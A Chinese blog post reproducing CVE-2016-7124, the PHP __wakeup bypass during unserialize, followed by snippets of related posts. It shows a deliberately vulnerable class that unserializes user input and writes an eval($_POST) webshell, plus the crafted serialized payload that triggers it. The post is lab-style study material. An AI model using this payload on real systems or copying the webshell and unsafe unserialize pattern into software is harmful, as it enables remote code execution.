PHP魔术方法反序列化(CVE-2016-7124)

已于 2022-03-31 15:36:59 修改
阅读量1.2k 收藏 1
点赞数
分类专栏: CVE漏洞复现 文章标签: php 安全 开发语言
于 2022-03-12 14:59:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_57379855/article/details/123443260
版权
本文详细探讨了PHP中的魔术方法`__wakeup`在反序列化过程中的作用,特别是针对CVE-2016-7124的安全漏洞。通过源码分析,展示了如何在PHP5低于5.6.25或PHP7低于7.0.10的环境中,利用此漏洞构造payload绕过`__wakeup`,并在对象析构时触发文件写入。关键在于通过增加成员变量数量来规避`__wakeup`中对成员变量的清空操作,实现安全漏洞的利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

PHP魔术方法反序列化(CVE-2016-7124)

PHP魔术方法反序列化

PHP5小于5.6.25或PHP7小于7.0.10

_wakeup

在对象被反序列化后被调用

源码分析

<?php
// 目标:反序列化的时候绕过__wakeup以达到写文件的操作
// CVE-2016-7124
// PHP5小于5.6.25或PHP7小于7.0.10
class Test
{
    // 私有成员变量
    private $poc = '';
    public function __construct($poc)
    {
        $this->poc = $poc;
    }

    function __destruct()
    {
        if ($this->poc != '')
        {
            file_put_contents('shell.php', '<?php eval($_POST["shell"]);?>');
           die('Success!!!');
       }
        else
        {
            die('fail to getshell!!!');
        }
    }

    function __wakeup()
    {
        // 返回由对象属性组成的关联数组,把所有的属性置空
        foreach(get_object_vars($this) as $k => $v)
        {
            $this->$k = null;
        }
        echo "waking up...n";
    }
}
$poc = $_GET['poc'];
/*if(!isset($poc))
{
    show_source(__FILE__);
    die();
}*/
print_r("your payload:".$poc);
$a = unserialize($poc);
// PHP5小于5.6.25或PHP7小于7.0.10

在这里插入图片描述

当成员变量的数量大于本身的成员变量的数量,就会跳过_wakeup魔术方法
当销毁的时触发一个生成一句话木马文件的析构函数
满足的条件是这个类的poc成员变量不为空
在这里插入图片描述

但是里面的_wakeup函数将所传的成员变量的值置空
在这里插入图片描述

反序列化成员变量
在这里插入图片描述

所以现在需要绕过这个_wakeup函数执行

php-poc

我们先序列化一下该成员变量
在这里插入图片描述
当成员变量的数量大于本身的成员变量的数量,就会跳过_wakeup魔术方法
所以增加一个成员变量或多个成员变量
O:4:“Test”:2:{s:9:" Testpoc";s:5:“shell”;}

但是要注意的是该poc成员变量是一个私有变量,序列化后与类名进行拼接了
所以可以通过url编码空格%00进行隔开
O:4:“Test”:2:{s:9:"%00Test%00poc";s:5:“shell”;}

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2.level2-[本地复现]-[越过wakeup]-[CVE-2016-7124]
qwsn
12-26 2021
我认为,无论是学习安全还是从事安全的人,多多少少都会有些许的情怀和使命感!!! 文章目录PHP反序列化漏洞level2-[本地复现]-[越过wakeup]-[CVE-2016-7124]1.题目描述2.代码审计3.解题过程4.总结 PHP反序列化漏洞 level2-[本地复现]-[越过wakeup]-[CVE-2016-7124] 1.题目描述 <?php include "flag.php"; class Connection { public $file; public fun
3.level3-[XCTF-unserialize3]-[CVE-2016-7124]
qwsn
11-19 283
0x01、Web 1.XCTF-unserialize3 第一步:开启环境 图略 第二步:访问题目链接,发现了一段php代码,如下所示 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-95BsdC0I-1605762236401)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20201107140737760.png)] 第三步:分析代码,很明显这里有一个魔术方法__wakeup,
php反序列化魔术方法
2301_80913334的博客
03-26 1852
_sleep()__wakeup()__invoke()__clone触发时机实例化对象对象引用完成或对象被销毁;反序列化之后序列化之前反序列化之前把对象当成字符串调用(使用echo或print)把对象当成函数调用当使用clone关键字拷贝完成一个对象功能提前清理不必要内容对象被序列化之前触发,返回需要被序列化储存的成员属性,删除不必要的属性参数返回值需要被序列化的成员属性__call()__get()__set()__isset()__unset()
oop魔术方法
小码农的博客
04-21 799
魔术方法PHP面向对象中特有的特性。它们在特定的情况下被触发,都是以双下划线开头,你可以把它们理解为钩子,利用模式方法可以轻松实现PHP面向对象中重载(Overloading即动态创建类属性和方法)。魔术方法很多还是成对出现的,以下列出目前PHP中所有的模式方法。 1.__construct,__destruct __constuct构建对象的时被调用; __destruct明
PHP反序列化
最新发布
ALe0721的博客
04-14 857
PHP 里,序列化是把一个对象或数组转换成字符串的过程(比如保存到文件或传输到网络),而反序列化就是把这个字符串还原成原来的变量(对象/数组)。// 序列化// 反序列化Phar(PHP Archive)是一种压缩包格式,允许 PHP 把一堆文件打包成一个.phar文件,像.zip一样可以解压,也可以当成普通文件一样 include、访问。Phar 归档中可以携带元数据(metadata),这个 metadata 是以 PHP 序列化格式保存。
php反序列化常见魔术方法整理
2302_79590880的博客
10-29 813
整理php反序列化代码审计中常见的可用魔术方法
PHP反序列化漏洞之魔术方法
Naive的博客
07-22 2575
PHP魔术方法(Magic Methods)是一组特殊的方法,它们在特定的情况下会被自动调用,用于实现对象的特殊行为或提供额外功能。本文详细介绍每一个魔术方法的触发时机、功能、参数以及返回值。这一点是在学习 PHP 反序列化漏洞中最重要的。
CVE-2016-7249
01-20
这个漏洞的利用方式与CVE-2016-7124类似,都是通过利用PHP魔术方法来执行恶意代码。 下面是一个简单的演示代码,用于说明CVE-2016-7249漏洞的利用过程: ```php <?php class Example { public $data; public ...
Yii2框架 反序列化漏洞复现(CVE-2020-15148)
snowlyzz的博客
10-25 1926
yii2框架 反序列化漏洞复现
php反序列化1_常见php序列化的CTF考题
书山有路勤为径,学海无涯苦作舟
11-25 1803
本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString()魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
PHP反序列化魔术方法
qq_60463414的博客
08-23 2740
php反序列化漏洞魔术方法
php序列化和反序列化&魔术方法
Pvr1sC的博客
02-19 898
前言 可能会需要有类的知识但这里不多赘述,和c++差不多就不多说了 序列化 在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。 内存数据——稍纵即逝,不可持久化。 变量所储存的数据,即内存数据,而文件是持久数据。 l 序列化: 序列化就是将内存中的变量数据,保存为文件中的持久数据的过程。将内存变成文件。 反序列化: 反序列化就是将序列化后存储到文件中的数据,恢复成php程序代码的变量表现形式的过程,将文件变成内存。 序列化函数原型如下: string serialize ( m
魔术方法总结
梦里不知身是客
12-26 9908
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
PHP魔术方法之序列化与反序列化技术
username_lx的博客
07-02 571
目前理解觉得序列化就是用来保存数据的,将对象或变量以字符串形式保存。反序列化无非就是序列化转化成原来的变量或对象。 1.序列化:   定义:就是将一个变量所代表的“内存”数据,转换为“字符串”形式并持久保存在硬盘中。    1.1普通变量的序列化 如:$v1 = 123;//这个变量代表内存空间的一段数据   $s1 = serialize($v1);//用serialize()方法将任
php反序列化 引用,PHP反序列化入门之常见魔术方法
weixin_42300418的博客
03-17 286
在学习 PHP 反序列化知识前,我们需要先了解一下 PHP 中的常见 魔术方法PHP将所有以 __ (两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除了上述魔术方法,建议不要以 __ 为前缀。__sleep在使用 serialize() 函数时,程序会检查类中是否存在一个 __sleep() 魔术方法。如果存在,则该方法会先被调用,然后再执行序列化操作。__wakeup在使用 u...
php反序列化原理&常见的魔术方法
永远都没有了
02-21 1848
php反序列化原理及常用魔术方法总结
PHP反序列化&魔术方法详细解析及实例&公私有属性对比
ran的博客
04-12 2614
2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。2.将代码执行后可以看到下面的执行结果。1.实验代码部分如下。1.实验代码部分如下。1.实验代码部分如下。1.实验代码部分如下。1.实验代码部分如下。
PHP反序列化&魔术方法
weixin_54882883的博客
06-17 1014
php反序列化
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值